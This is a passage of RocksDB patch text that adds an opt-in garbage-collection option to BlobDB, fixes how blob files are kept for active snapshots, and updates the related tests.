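      rocksdb::blob_db::BlobDBOptions bdb_options;
      bdb_options.enable_garbage_collection = true;  // opt in; default false
      return rocksdb::blob_db::BlobDB::Open(options, bdb_options, dbname, db);
    }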
Closes https://github.com/facebook/rocksdb/pull/3117 Differential Revision: D6224756 Pulled By: yiwu-arbug fbshipit-source-id: cdf53bdccec96a4580a2b3a342110ad9e8864dfe --- utilities/blob_db/blob_db.cc | 46 ++++++++++++++++++++----------- utilities/blob_db/blob_db.h | 7 ++++- utilities/blob_db/blob_db_impl.cc | 45 +++++++++++++++++++----------- 3 files changed, 65 insertions(+), 33 deletions(-) diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc index 1fd9261417b..f763ced20cf 100644 --- a/utilities/blob_db/blob_db.cc +++ b/utilities/blob_db/blob_db.cc @@ -57,12 +57,16 @@ Status BlobDB::OpenAndLoad(const Options& options, { MutexLock l(&listener_mutex); all_blobdb_listeners.push_back(fblistener); - all_blobdb_listeners.push_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + all_blobdb_listeners.push_back(ce_listener); + } all_wal_filters.push_back(rw_filter); } changed_options->listeners.emplace_back(fblistener); - changed_options->listeners.emplace_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + changed_options->listeners.emplace_back(ce_listener); + } changed_options->wal_filter = rw_filter.get(); DBOptions db_options(*changed_options); @@ -71,7 +75,9 @@ Status BlobDB::OpenAndLoad(const Options& options, BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); - ce_listener->SetImplPtr(bdb); + if (bdb_options.enable_garbage_collection) { + ce_listener->SetImplPtr(bdb); + } rw_filter->SetImplPtr(bdb); Status s = bdb->OpenPhase1(); @@ -124,20 +130,26 @@ Status BlobDB::Open(const DBOptions& db_options_input, ReconcileWalFilter_t rw_filter = std::make_shared(); db_options.listeners.emplace_back(fblistener); - db_options.listeners.emplace_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + db_options.listeners.emplace_back(ce_listener); + } db_options.wal_filter = rw_filter.get(); { MutexLock l(&listener_mutex); all_blobdb_listeners.push_back(fblistener); - all_blobdb_listeners.push_back(ce_listener); + if (bdb_options.enable_garbage_collection) { + all_blobdb_listeners.push_back(ce_listener); + } all_wal_filters.push_back(rw_filter); } // we need to open blob db first so that recovery can happen BlobDBImpl* bdb = new BlobDBImpl(dbname, bdb_options, db_options); fblistener->SetImplPtr(bdb); - ce_listener->SetImplPtr(bdb); + if (bdb_options.enable_garbage_collection) { + ce_listener->SetImplPtr(bdb); + } rw_filter->SetImplPtr(bdb); s = bdb->OpenPhase1(); @@ -172,25 +184,27 @@ Status BlobDB::Open(const DBOptions& db_options_input, BlobDB::BlobDB(DB* db) : StackableDB(db) {} void BlobDBOptions::Dump(Logger* log) const { - ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir: %s", blob_dir.c_str()); - ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.path_relative: %d", path_relative); - ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.is_fifo: %d", is_fifo); - ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, + ROCKS_LOG_HEADER(log, " blob_db_options.blob_dir_size: %" PRIu64, blob_dir_size); - ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_range_secs: %" PRIu32, ttl_range_secs); - ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, + ROCKS_LOG_HEADER(log, " blob_db_options.bytes_per_sync: %" PRIu64, bytes_per_sync); - ROCKS_LOG_HEADER(log, " 
blob_db_options.blob_file_size: %" PRIu64, blob_file_size); - ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", + ROCKS_LOG_HEADER(log, " blob_db_options.ttl_extractor: %p", ttl_extractor.get()); - ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", + ROCKS_LOG_HEADER(log, " blob_db_options.compression: %d", static_cast(compression)); - ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", + ROCKS_LOG_HEADER(log, "blob_db_options.enable_garbage_collection: %d", + enable_garbage_collection); + ROCKS_LOG_HEADER(log, " blob_db_options.disable_background_tasks: %d", disable_background_tasks); } diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 1ef382ab867..3ade460eb2f 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -71,7 +71,12 @@ struct BlobDBOptions { // what compression to use for Blob's CompressionType compression = kNoCompression; - // Disable all background job. + // If enabled, blob DB periodically cleans up stale data by rewriting the + // remaining live data in blob files to new files. If garbage collection is + // not enabled, blob files will be cleaned up based on TTL. + bool enable_garbage_collection = false; + + // Disable all background jobs. Used for tests only. bool disable_background_tasks = false; void Dump(Logger* log) const; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 79e2203e01a..3a6a84babef 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -69,6 +69,7 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( int level, const Slice& key, CompactionEventListener::CompactionListenerValueType value_type, const Slice& existing_value, const SequenceNumber& sn, bool is_new) { + assert(impl_->bdb_options_.enable_garbage_collection); if (!is_new && value_type == CompactionEventListener::CompactionListenerValueType::kValue) { @@ -213,12 +214,14 @@ void BlobDBImpl::StartBackgroundTasks() { std::bind(&BlobDBImpl::ReclaimOpenFiles, this, std::placeholders::_1)); tqueue_.add(kGCCheckPeriodMillisecs, std::bind(&BlobDBImpl::RunGC, this, std::placeholders::_1)); - tqueue_.add( - kDeleteCheckPeriodMillisecs, - std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); - tqueue_.add( - kDeleteCheckPeriodMillisecs, - std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); + if (bdb_options_.enable_garbage_collection) { + tqueue_.add( + kDeleteCheckPeriodMillisecs, + std::bind(&BlobDBImpl::EvictDeletions, this, std::placeholders::_1)); + tqueue_.add( + kDeleteCheckPeriodMillisecs, + std::bind(&BlobDBImpl::EvictCompacted, this, std::placeholders::_1)); + } tqueue_.add( kDeleteObsoleteFilesPeriodMillisecs, std::bind(&BlobDBImpl::DeleteObsoleteFiles, this, std::placeholders::_1)); @@ -659,8 +662,10 @@ Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); Status s = db_->Delete(options, key); - // add deleted key to list of keys that have been deleted for book-keeping - delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); + if (bdb_options_.enable_garbage_collection) { + // add deleted key to list of keys that have been deleted for book-keeping + delete_keys_q_.enqueue({DefaultColumnFamily(), key.ToString(), lsn}); + } return s; } @@ -780,11 +785,13 @@ Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) {
SequenceNumber sequence_; }; - // add deleted key to list of keys that have been deleted for book-keeping - DeleteBookkeeper delete_bookkeeper(this, current_seq); - updates->Iterate(&delete_bookkeeper); + if (bdb_options_.enable_garbage_collection) { + // add deleted key to list of keys that have been deleted for book-keeping + DeleteBookkeeper delete_bookkeeper(this, current_seq); + s = updates->Iterate(&delete_bookkeeper); + } - return Status::OK(); + return s; } Status BlobDBImpl::GetLiveFiles(std::vector& ret, @@ -1318,6 +1325,7 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, uint64_t blob_offset, uint64_t blob_size) { + assert(bdb_options_.enable_garbage_collection); (void)blob_offset; std::shared_ptr bfile; { @@ -1340,6 +1348,7 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, } bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { + assert(bdb_options_.enable_garbage_collection); BlobIndex blob_index; Status s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { @@ -1354,6 +1363,7 @@ bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { } std::pair BlobDBImpl::EvictCompacted(bool aborted) { + assert(bdb_options_.enable_garbage_collection); if (aborted) return std::make_pair(false, -1); override_packet_t packet; @@ -1377,6 +1387,7 @@ std::pair BlobDBImpl::EvictCompacted(bool aborted) { } std::pair BlobDBImpl::EvictDeletions(bool aborted) { + assert(bdb_options_.enable_garbage_collection); if (aborted) return std::make_pair(false, -1); ColumnFamilyHandle* last_cfh = nullptr; @@ -1882,10 +1893,12 @@ bool BlobDBImpl::ShouldGCFile(std::shared_ptr bfile, uint64_t now, ReadLock lockbfile_r(&bfile->mutex_); - if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > - kPartialExpirationPercentage) { - *reason = "deleted simple blobs beyond threshold"; - return true; + if (bdb_options_.enable_garbage_collection) { + if ((bfile->deleted_size_ * 100.0 / bfile->file_size_.load()) > + kPartialExpirationPercentage) { + *reason = "deleted simple blobs beyond threshold"; + return true; + } } // if we haven't reached limits of disk space, don't DELETE From f90ced92f54890bd435ea3c10cbf664d2176f839 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 2 Nov 2017 15:50:30 -0700 Subject: [PATCH 185/205] Blob DB: fix snapshot handling Summary: Blob DB will keep a blob file if data in the file is visible to an active snapshot. Before this patch, it checked whether there is an active snapshot with a sequence number greater than the earliest sequence in the file. This is problematic since we take a snapshot on every read; if reads keep coming, old blob files will never be cleaned up. Change it to check whether there is an active snapshot falling in the range [earliest_sequence, obsolete_sequence), where the obsolete sequence is 1. if data is relocated to another file by garbage collection, the latest sequence at the time garbage collection finishes, or 2.
Closes https://github.com/facebook/rocksdb/pull/3087 Differential Revision: D6182519 Pulled By: yiwu-arbug fbshipit-source-id: cdf4c35281f782eb2a9ad6a87b6727bbdff27a45 --- db/db_impl.cc | 8 +- db/db_impl.h | 4 +- db/snapshot_impl.h | 16 ++++ utilities/blob_db/blob_db_impl.cc | 90 +++++++++--------- utilities/blob_db/blob_db_impl.h | 3 +- utilities/blob_db/blob_db_test.cc | 148 +++++++++++++++++++++--------- utilities/blob_db/blob_file.cc | 18 ++-- utilities/blob_db/blob_file.h | 30 ++++-- 8 files changed, 207 insertions(+), 110 deletions(-) diff --git a/db/db_impl.cc b/db/db_impl.cc index 0bf425afb71..d1bfe41e8ca 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1583,12 +1583,10 @@ void DBImpl::ReleaseSnapshot(const Snapshot* s) { delete casted_s; } -bool DBImpl::HasActiveSnapshotLaterThanSN(SequenceNumber sn) { +bool DBImpl::HasActiveSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound) { InstrumentedMutexLock l(&mutex_); - if (snapshots_.empty()) { - return false; - } - return (snapshots_.newest()->GetSequenceNumber() >= sn); + return snapshots_.HasSnapshotInRange(lower_bound, upper_bound); } #ifndef ROCKSDB_LITE diff --git a/db/db_impl.h b/db/db_impl.h index 230f614b4f4..f1730f9adbd 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -216,7 +216,9 @@ class DBImpl : public DB { virtual SequenceNumber GetLatestSequenceNumber() const override; - bool HasActiveSnapshotLaterThanSN(SequenceNumber sn); + // Whether there is an active snapshot in range [lower_bound, upper_bound). + bool HasActiveSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound); #ifndef ROCKSDB_LITE using DB::ResetStats; diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index ad9c1a9fbcc..7dc405931cb 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -108,6 +108,22 @@ class SnapshotList { return ret; } + // Whether there is an active snapshot in range [lower_bound, upper_bound). + bool HasSnapshotInRange(SequenceNumber lower_bound, + SequenceNumber upper_bound) { + if (empty()) { + return false; + } + const SnapshotImpl* s = &list_; + while (s->next_ != &list_) { + if (s->next_->number_ >= lower_bound) { + return s->next_->number_ < upper_bound; + } + s = s->next_; + } + return false; + } + // get the sequence number of the most recent snapshot SequenceNumber GetNewest() { if (empty()) { diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 3a6a84babef..74676d4fa7b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -956,10 +956,24 @@ bool BlobDBImpl::EvictOldestBlobFile() { } WriteLock wl(&mutex_); - oldest_file->SetCanBeDeleted(); - obsolete_files_.push_front(oldest_file); - oldest_file_evicted_.store(true); - return true; + // Double check that the file has not been made obsolete by others + if (oldest_file_evicted_ == false && !oldest_file->Obsolete()) { + auto expiration_range = oldest_file->GetExpirationRange(); + ROCKS_LOG_INFO(db_options_.info_log, + "Evict oldest blob file since DB out of space. 
Current " + "space used: %" PRIu64 ", blob dir size: %" PRIu64 + ", evicted blob file #%" PRIu64 + " with expiration range (%" PRIu64 ", %" PRIu64 ").", + total_blob_space_.load(), bdb_options_.blob_dir_size, + oldest_file->BlobFileNumber(), expiration_range.first, + expiration_range.second); + oldest_file->MarkObsolete(oldest_file->GetSequenceRange().second); + obsolete_files_.push_back(oldest_file); + oldest_file_evicted_.store(true); + return true; + } + + return false; } Status BlobDBImpl::CheckSize(size_t blob_size) { @@ -1299,27 +1313,12 @@ Status BlobDBImpl::CloseBlobFileIfNeeded(std::shared_ptr& bfile) { return CloseBlobFile(bfile); } -bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( +bool BlobDBImpl::VisibleToActiveSnapshot( const std::shared_ptr& bfile) { assert(bfile->Obsolete()); - - SequenceNumber esn = bfile->GetSequenceRange().first; - - // TODO(yiwu): Here we should check instead if there is an active snapshot - // lies between the first sequence in the file, and the last sequence by - // the time the file finished being garbage collect. - bool notok = db_impl_->HasActiveSnapshotLaterThanSN(esn); - if (notok) { - ROCKS_LOG_INFO(db_options_.info_log, - "Could not delete file due to snapshot failure %s", - bfile->PathName().c_str()); - return false; - } else { - ROCKS_LOG_INFO(db_options_.info_log, - "Will delete file due to snapshot success %s", - bfile->PathName().c_str()); - return true; - } + SequenceNumber first_sequence = bfile->GetSequenceRange().first; + SequenceNumber obsolete_sequence = bfile->GetObsoleteSequence(); + return db_impl_->HasActiveSnapshotInRange(first_sequence, obsolete_sequence); } bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, @@ -1697,7 +1696,7 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, ReadOptions(), cfh, record.key, &index_entry, nullptr /*value_found*/, &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); - if (!get_status.ok() && !get_status.ok()) { + if (!get_status.ok() && !get_status.IsNotFound()) { // error s = get_status; ROCKS_LOG_ERROR(db_options_.info_log, @@ -1814,6 +1813,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, &rewrite_batch, &callback); } if (rewrite_status.ok()) { + newfile->ExtendSequenceRange( + WriteBatchInternal::Sequence(&rewrite_batch)); gc_stats->relocate_succeeded++; } else if (rewrite_status.IsBusy()) { // The key is overwritten in the meanwhile. Drop the blob record. @@ -1827,6 +1828,17 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, } } // end of ReadRecord loop + if (s.ok()) { + SequenceNumber obsolete_sequence = + newfile == nullptr ? 
bfptr->GetSequenceRange().second + 1 + : newfile->GetSequenceRange().second; + bfptr->MarkObsolete(obsolete_sequence); + if (!first_gc) { + WriteLock wl(&mutex_); + obsolete_files_.push_back(bfptr); + } + } + ROCKS_LOG_INFO( db_options_.info_log, "%s blob file %" PRIu64 @@ -1935,11 +1947,17 @@ std::pair BlobDBImpl::DeleteObsoleteFiles(bool aborted) { auto bfile = *iter; { ReadLock lockbfile_r(&bfile->mutex_); - if (!FileDeleteOk_SnapshotCheckLocked(bfile)) { + if (VisibleToActiveSnapshot(bfile)) { + ROCKS_LOG_INFO(db_options_.info_log, + "Could not delete file due to snapshot failure %s", + bfile->PathName().c_str()); ++iter; continue; } } + ROCKS_LOG_INFO(db_options_.info_log, + "Will delete file due to snapshot success %s", + bfile->PathName().c_str()); blob_files_.erase(bfile->BlobFileNumber()); Status s = env_->DeleteFile(bfile->PathName()); @@ -2069,8 +2087,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { FilterSubsetOfFiles(blob_files, &to_process, current_epoch_, files_to_collect); - // in this collect the set of files, which became obsolete - std::vector> obsoletes; for (auto bfile : to_process) { GCStats gc_stats; Status s = GCFileAndUpdateLSM(bfile, &gc_stats); @@ -2084,16 +2100,6 @@ std::pair BlobDBImpl::RunGC(bool aborted) { bfile->deleted_size_ = gc_stats.deleted_size; bfile->deleted_count_ = gc_stats.num_deletes; bfile->gc_once_after_open_ = false; - } else { - obsoletes.push_back(bfile); - } - } - - if (!obsoletes.empty()) { - WriteLock wl(&mutex_); - for (auto bfile : obsoletes) { - bfile->SetCanBeDeleted(); - obsolete_files_.push_front(bfile); } } @@ -2190,16 +2196,6 @@ Status BlobDBImpl::TEST_GCFileAndUpdateLSM(std::shared_ptr& bfile, } void BlobDBImpl::TEST_RunGC() { RunGC(false /*abort*/); } - -void BlobDBImpl::TEST_ObsoleteFile(std::shared_ptr& bfile) { - uint64_t number = bfile->BlobFileNumber(); - assert(blob_files_.count(number) > 0); - bfile->SetCanBeDeleted(); - { - WriteLock l(&mutex_); - obsolete_files_.push_back(bfile); - } -} #endif // !NDEBUG } // namespace blob_db diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index fc36712bed6..9881107d35f 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -279,8 +279,6 @@ class BlobDBImpl : public BlobDB { void TEST_RunGC(); - void TEST_ObsoleteFile(std::shared_ptr& bfile); - void TEST_DeleteObsoleteFiles(); #endif // !NDEBUG @@ -411,6 +409,7 @@ class BlobDBImpl : public BlobDB { // checks if there is no snapshot which is referencing the // blobs + bool VisibleToActiveSnapshot(const std::shared_ptr& file); bool FileDeleteOk_SnapshotCheckLocked(const std::shared_ptr& bfile); bool MarkBlobDeleted(const Slice& key, const Slice& lsmValue); diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 9ffdb234f7c..1c949356541 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -63,6 +63,22 @@ class BlobDBTest : public testing::Test { } } + BlobDBImpl *blob_db_impl() { + return reinterpret_cast(blob_db_); + } + + Status Put(const Slice &key, const Slice &value) { + return blob_db_->Put(WriteOptions(), key, value); + } + + void Delete(const std::string &key, + std::map *data = nullptr) { + ASSERT_OK(blob_db_->Delete(WriteOptions(), key)); + if (data != nullptr) { + data->erase(key); + } + } + void PutRandomWithTTL(const std::string &key, uint64_t ttl, Random *rnd, std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; @@ -111,14 +127,6 @@ class BlobDBTest : public testing::Test { } 
} - void Delete(const std::string &key, - std::map *data = nullptr) { - ASSERT_OK(blob_db_->Delete(WriteOptions(), key)); - if (data != nullptr) { - data->erase(key); - } - } - // Verify blob db contain expected data and nothing more. void VerifyDB(const std::map &data) { VerifyDB(blob_db_, data); @@ -593,16 +601,14 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); DBImpl *db_impl = static_cast_with_check(blob_db_->GetBaseDB()); std::map data; for (int i = 0; i < 200; i++) { PutRandom("key" + ToString(i), &rnd, &data); } - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); // Test for data in SST size_t new_keys = 0; for (int i = 0; i < 100; i++) { @@ -620,7 +626,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { } } GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(200, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); ASSERT_EQ(200 - new_keys, gc_stats.num_relocate); @@ -634,11 +640,9 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { bdb_options.disable_background_tasks = true; Open(bdb_options); ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", @@ -651,7 +655,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); }); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(0, gc_stats.num_deletes); ASSERT_EQ(1, gc_stats.num_relocate); @@ -671,11 +675,9 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Open(bdb_options, options); mock_env_->set_current_time(100); ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200)); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( @@ -690,7 +692,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { }); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(1, gc_stats.num_deletes); ASSERT_EQ(0, gc_stats.delete_succeeded); @@ -719,9 +721,7 @@ TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { for (int i = 0; i < 10; i++) { 
ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value)); } - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(11, blob_files.size()); ASSERT_TRUE(blob_files[0]->HasTTL()); ASSERT_TRUE(blob_files[0]->Immutable()); @@ -731,9 +731,9 @@ TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) { ASSERT_TRUE(blob_files[i]->Immutable()); } } - blob_db_impl->TEST_RunGC(); + blob_db_impl()->TEST_RunGC(); // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC. - auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles(); ASSERT_EQ(1, obsolete_files.size()); ASSERT_EQ(blob_files[1]->BlobFileNumber(), obsolete_files[0]->BlobFileNumber()); @@ -747,13 +747,11 @@ TEST_F(BlobDBTest, ReadWhileGC) { bdb_options.disable_background_tasks = true; Open(bdb_options); blob_db_->Put(WriteOptions(), "foo", "bar"); - BlobDBImpl *blob_db_impl = - static_cast_with_check(blob_db_); - auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + auto blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); std::shared_ptr bfile = blob_files[0]; uint64_t bfile_number = bfile->BlobFileNumber(); - ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(bfile)); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile)); switch (i) { case 0: @@ -791,17 +789,16 @@ TEST_F(BlobDBTest, ReadWhileGC) { TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1"); GCStats gc_stats; - ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); ASSERT_EQ(1, gc_stats.blob_count); ASSERT_EQ(1, gc_stats.num_relocate); ASSERT_EQ(1, gc_stats.relocate_succeeded); - blob_db_impl->TEST_ObsoleteFile(blob_files[0]); - blob_db_impl->TEST_DeleteObsoleteFiles(); + blob_db_impl()->TEST_DeleteObsoleteFiles(); // The file shouln't be deleted - blob_files = blob_db_impl->TEST_GetBlobFiles(); + blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(2, blob_files.size()); ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber()); - auto obsolete_files = blob_db_impl->TEST_GetObsoleteFiles(); + auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles(); ASSERT_EQ(1, obsolete_files.size()); ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber()); TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2"); @@ -809,16 +806,85 @@ TEST_F(BlobDBTest, ReadWhileGC) { SyncPoint::GetInstance()->DisableProcessing(); // The file is deleted this time - blob_db_impl->TEST_DeleteObsoleteFiles(); - blob_files = blob_db_impl->TEST_GetBlobFiles(); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + blob_files = blob_db_impl()->TEST_GetBlobFiles(); ASSERT_EQ(1, blob_files.size()); ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber()); - ASSERT_EQ(0, blob_db_impl->TEST_GetObsoleteFiles().size()); + ASSERT_EQ(0, blob_db_impl()->TEST_GetObsoleteFiles().size()); VerifyDB({{"foo", "bar"}}); Destroy(); } } +TEST_F(BlobDBTest, SnapshotAndGarbageCollection) { + BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; + bdb_options.disable_background_tasks = true; + // i = when to take snapshot + for (int i = 0; i < 4; i++) { + for (bool delete_key : {true, false}) { + const Snapshot *snapshot = nullptr; + Destroy(); + Open(bdb_options); + // First file + ASSERT_OK(Put("key1", "value")); + if (i == 0) { + snapshot = blob_db_->GetSnapshot(); + } + auto blob_files = 
blob_db_impl()->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0])); + // Second file + ASSERT_OK(Put("key2", "value")); + if (i == 1) { + snapshot = blob_db_->GetSnapshot(); + } + blob_files = blob_db_impl()->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + auto bfile = blob_files[1]; + ASSERT_FALSE(bfile->Immutable()); + ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile)); + // Third file + ASSERT_OK(Put("key3", "value")); + if (i == 2) { + snapshot = blob_db_->GetSnapshot(); + } + if (delete_key) { + Delete("key2"); + } + GCStats gc_stats; + ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats)); + ASSERT_TRUE(bfile->Obsolete()); + ASSERT_EQ(1, gc_stats.blob_count); + if (delete_key) { + ASSERT_EQ(0, gc_stats.num_relocate); + ASSERT_EQ(bfile->GetSequenceRange().second + 1, + bfile->GetObsoleteSequence()); + } else { + ASSERT_EQ(1, gc_stats.num_relocate); + ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), + bfile->GetObsoleteSequence()); + } + if (i == 3) { + snapshot = blob_db_->GetSnapshot(); + } + size_t num_files = delete_key ? 3 : 4; + ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + if (i == 0 || i == 3 || (i == 2 && delete_key)) { + // The snapshot shouldn't see data in bfile + ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + } else { + // The snapshot will see data in bfile, so the file shouldn't be deleted + ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size()); + blob_db_->ReleaseSnapshot(snapshot); + blob_db_impl()->TEST_DeleteObsoleteFiles(); + ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size()); + } + } + } +} + TEST_F(BlobDBTest, ColumnFamilyNotSupported) { Options options; options.env = mock_env_.get(); @@ -962,7 +1028,7 @@ TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) { bdb_options.is_fifo = true; 